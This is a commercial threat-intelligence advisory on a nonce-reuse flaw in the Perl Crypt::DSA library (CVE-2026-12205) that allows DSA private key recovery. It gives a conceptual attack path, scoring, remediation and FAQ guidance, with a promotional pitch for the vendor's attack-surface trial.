External risk intelligence

Crypt::DSA Reused Nonce Vulnerability Allows Private Key Recovery.

CVE advisorySeverity: CRITICAL (CVSS 9.1)

CVE-2026-12205

A vulnerability in the Crypt::DSA Perl library allows attackers to recover private keys if a key is used for multiple signatures. This could lead to the exposure of sensitive information and the ability to forge signatures. It is uncertain how widely this library is used within the environment, necessitating confirmati

1Halo Surface Signal

External exposure likelihood

Halo Surface Signal score for CVE-2026-12205

This vulnerability resides in the Crypt::DSA Perl library, which is a development dependency, not a standalone network service. Exposure is entirely dependent on how third-party applications integrate and utilize the library's signing functions. As it lacks a public interface or appliance exposure by design, the inherent surface signal for this library remains very low.

PCI scan relevance

PCI Relevance for CVE-2026-12205

Yes

CVE-2026-12205 — Halo PCI Relevance: Yes. Under typical PCI ASV external scan criteria, this issue may be flagged for scan prioritization.

This vulnerability allows for private key recovery due to cryptographic flaws in signature generation, which is a critical issue that could impact systems handling payment card data and require remediation for PCI compliance.

Scan-prioritization guidance only—not a PCI DSS certification or ASV attestation.

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Horizon Alert

Summary of the vulnerability and why it matters

A vulnerability has been identified in the Crypt::DSA library for Perl that could allow for the recovery of private keys when used for signing. This means that if a key has been used to sign more than once with an affected version, it should be considered compromised. The main concern is to confirm if this library is in use within our systems and if so, to what extent.

  • Crypt::DSA improperly reuses signing keys.
  • Compromised keys could expose sensitive information.
  • Confirm usage and assess potential impact.

Attack Path

How an attacker could exploit the issue

An attacker could gain access to a system using the Crypt::DSA Perl library if they can influence the creation of digital signatures. By observing or manipulating the signing process, an attacker could exploit the library's tendency to reuse a specific cryptographic value (nonce) across multiple signatures. This reuse allows an attacker to potentially recover the secret private key associated with the affected DSA key pair, granting them significant control and the ability to forge signatures or decrypt sensitive information.

  • Attacker must influence signature creation.
  • Reused nonce enables key recovery.
  • Compromised keys lead to forgery.

Live Threat

Current exploitation, exposure, and threat context

When Crypt::DSA is used to generate multiple signatures with the same key, an attacker could recover the private key. This occurs because the nonce used in signature generation is reused across all signatures created with a specific key.

  • Private keys could be exposed.
  • Multiple signatures with one key.
  • Attacker recovers private key.

Operational Fix

Recommended remediation, mitigation, and detection steps

Determining precise ownership requires understanding how the Crypt::DSA Perl library is integrated into your environment; application owners, platform teams, or development teams who use this library for signing operations are likely accountable. The first actionable step is to identify all systems and applications that utilize Crypt::DSA for signing, assess their business criticality and exposure, and then confirm the accountable owner before planning remediation.

  • Identify applications using Crypt::DSA.
  • Verify usage and business criticality.
  • Plan remediation with accountable owners.

Validate whether this threat affects your internet-facing exposure.

Halo Threat Intelligence helps prioritize remediation with Halo Surface Signal and H/A/L/O context. Start exposure validation with a free external attack surface trial.

Free EASM Trial See How Signal Works

Frequently asked questions

What is Crypt::DSA?

Crypt::DSA is a software library written in Perl used by developers to perform Digital Signature Algorithm (DSA) operations. It provides functions to generate cryptographic keys and create digital signatures for data. Because it is a code-level library, it is typically embedded as a dependency within custom applications or other software rather than operating as a standalone program or network service.

What is the vulnerability in CVE-2026-12205?

The library suffers from a weakness known as CWE-323: Reusing a Nonce in a Cryptographic Operation. In secure cryptography, a 'nonce' (number used once) must be unique for every signature to keep the private key secret. CVE-2026-12205 means affected versions of Crypt::DSA mistakenly reuse the same nonce whenever the same key is used to sign multiple times, which mathematically reveals the underlying private key to anyone observing the signatures.

How does an attacker trigger this vulnerability?

An attacker needs the software to generate at least two digital signatures using the same key pair. The flaw is inherent to the library's internal logic and occurs automatically during repeated signing operations. It is not triggered by a specific network request or malformed input; rather, the vulnerability exists whenever the library performs its standard signing function multiple times on the same object without clearing the cached nonce material.

Is my system at risk according to Halo Surface Signal?

Halo Surface Signal indicates the risk is very unlikely because Crypt::DSA is a development library, not a public-facing service. Exposure depends entirely on whether your custom-built applications integrate this library to perform signing tasks. Since the library lacks its own network interface, the threat is localized to the specific internal codebases where the library is explicitly implemented.

What should I do if I use Crypt::DSA?

First, audit your application dependencies to confirm if your software relies on an affected version of Crypt::DSA. If usage is confirmed, treat any private keys that have generated multiple signatures as compromised and revoke them immediately. Work with your development teams to update the library to version 1.21 or later, which resolves the nonce reuse, and rotate all keys involved in past signing operations.

References

Sources and related resources

Primary sources: NVD, CVE.org.

NVDPublished Modified